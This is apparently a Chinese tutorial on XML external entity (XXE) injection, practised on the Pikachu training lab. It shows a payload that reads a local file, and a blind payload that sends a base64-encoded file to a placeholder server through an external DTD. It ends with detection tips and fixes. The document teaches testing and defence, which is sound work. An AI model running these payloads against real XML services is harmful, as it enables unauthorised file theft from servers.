先上小迪的思维导图
概念
XML:传输和存储数据格式类型
XXE:XML外部实体注入漏洞(XML External Entity Injection)
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
上图中的DTD是实体,DTD中的内容就是内部实体的一个声明,图中声明了note作为一个父标签,其中to,from…是note的子标签。
而这张图便是DTD外部实体声明,外部有一个.dtd文件通过SYSTEM"**.dtd"来引用
有回显XXE
通过外部实体我们可以去读取相关文件,拿pikachu靶场说明
首先在我的D盘中创建了一个1.txt的文件
我们编辑好XML文档声明:
<?xml version = "1.0"?>
<!DOCTYPE ANY[
<!ENTITY xxe SYSTEM "file:///D://1.txt">
//!ENTITY xxe 可以理解为xxe就是代表后面SYSTEM引用的文件
//file:理解为file协议,也可以用其他协议,如http、ftp等实现相关的功能,
//SYSTEM后面必须跟文件
]>
<x>&xxe;</x>
//这里将xxe的内容通过标签显示
复制到靶场中
可以得到1.txt中的内容
无回显XXE
还是用Pikachu靶场,这里我们要修改下源代码,使其不回显
在vul/xxe/xxe_1.php中将 "echo $html"注释掉,可复现无回显的情况
无回显payload
<?xml version="1.0"?>
<!DOCTYPE test[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d://xx.txt">//读取文件
<!ENTITY% dtd SYSTEM "http://xxx.xxx.xx.xx:xx/xx.dtd">//访问url里xx.dtd文件,xx.dtd文件内容在下方
//这里url填自己本地的xx.dtd文件
%dtd;
%send;
]>
xx.dtd中内容:
<!ENTITY % payload "<!ELEMENT % send SYSTEM
'http://xxx.xxx.xx.xx:xx/?data=%file;'>"
>
%payload;
将上述payload放入靶场中,在xx.dtd文件里设置的url服务器日志中可查看回显结果
将base64解密,即可得到d://xx.txt的文件内容
发现XEE
这里主要说黑盒测试,主要以下几点:
1.根据数据格式类型判断:testHello
2.根据数据包中Content-Type值判断:如有text/xml、application/xml
3.更改Content-Type值看返回(盲猜),再把攻击语句写进数据包测试
4.做个脚本小子,用工具:附链接https://www.cnblogs.com/bmjoker/p/9614990.html
XXE修复
xxe漏洞修复与防御方案-php、Java、python-过滤及禁用
方案一:禁用外部实体 比如设置PHP:libxml_disable_entity_loader(true); ,其他语言百度搜索
方案二:过滤用户提交的XML数据 过滤关键词:<!DOCTYPE和<!ENTITY或者SYSTEM和PUBLIC